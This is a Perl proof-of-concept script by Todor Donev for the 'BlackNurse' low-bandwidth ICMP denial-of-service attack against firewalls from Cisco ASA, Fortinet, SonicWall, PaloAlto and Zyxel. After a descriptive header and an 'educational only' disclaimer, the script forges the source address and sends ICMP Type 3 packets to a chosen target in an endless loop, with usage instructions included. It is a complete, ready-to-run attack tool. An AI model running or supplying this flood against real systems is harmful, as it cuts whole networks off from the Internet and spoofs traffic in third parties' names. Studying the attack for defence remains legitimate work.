Cisco SonicWall Fortinet Spoofed "BlackNurse" DoS PoC

1. #!/usr/bin/perl
2. #
3. # Cisco ASA 5515/5525/5550/5515-X | Fotinet |
4. # Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N |
5. # Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC
6. #
7. #  Copyright 2016 (c) Todor Donev
8. #  Varna, Bulgaria
9. #  todor.donev@gmail.com
10. #  https://www.ethical-hacker.org/
11. #  https://www.facebook.com/ethicalhackerorg
12. #  http://pastebin.com/u/hackerscommunity
13. #
14. #
15. #  Description:
16. #  Blacknurse is a low bandwidth ICMP attack that is capable of doing denial
17. #  of service to well known firewalls. Most ICMP attacks that we see are based
18. #  on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based
19. #  on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP
20. #  Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly
21. #  effective even at low bandwidth. Low bandwidth is in this case around 15-18
22. #  Mbit/s. This is to achieve the volume of packets needed which is around 40 to
23. #  50K packets per second. It does not matter if you have a 1 Gbit/s Internet
24. #  connection. The impact we see on different firewalls is typically high CPU
25. #  loads. When an attack is ongoing, users from the LAN side will no longer be
26. #  able to send/receive traffic to/from the Internet. All firewalls we have seen
27. #  recover when the attack stops.
28. #
29. #  Disclaimer:
30. #  This or previous program is for Educational purpose ONLY. Do not
31. #  use it without permission. The usual disclaimer applies, especially
32. #  the fact that Todor Donev is not liable for any damages caused by
33. #  direct or indirect use of the information or functionality provided
34. #  by these programs. The author or any Internet provider bears NO
35. #  responsibility for content or misuse of these programs or any
36. #  derivatives thereof. By using these programs you accept the fact
37. #  that any damage (dataloss, system crash, system compromise, etc.)
38. #  caused by the use of these programs is not Todor Donev's
39. #  responsibility.
40. #
41. #  Use at your own risk and educational
42. #  purpose ONLY!
43. #
44. #  Thanks to Maya (Maiya|Mia) Hristova and all my friends
45. #  that support me.
46. #
47. #
48.  
49. use Net::RawIP;
50.  
51. print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed \"BlackNurse\" DoS PoC\n";
52. print "[ ======\n";
53. print "[ Usg: $0 <spoofed address> <target>\n";
54. print "[ Example: perl $0 133.71.33.7 192.168.1.1\n";
55. print "[ ======\n";
56. print "[ <todor.donev\@gmail.com> Todor Donev\n";
57. print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
58. print "[ Website: https://www.ethical-hacker.org/\n";
59.  
60. my $spoof          = $ARGV[0];
61. my $target         = $ARGV[1];
62.  
63. my $sock =  new Net::RawIP({ icmp => {} }) or die;
64.  
65. print "[ Sending crafted packets..\n";
66. while () {
67.                 $sock->set({  ip =>  { saddr  => $spoof, daddr => $target},
68.                               icmp =>  { type => 3, code => 3} });
69.                 $sock->send;
70.                 $sock->set({  icmp => { type=>3, code => 0}});
71.                 $sock->send;
72.                 $sock->set({  icmp => { type=>3, code => 1}});
73.                 $sock->send;
74.                 $sock->set({  icmp => { type=>3, code => 2}});
75.                 $sock->send;
76. }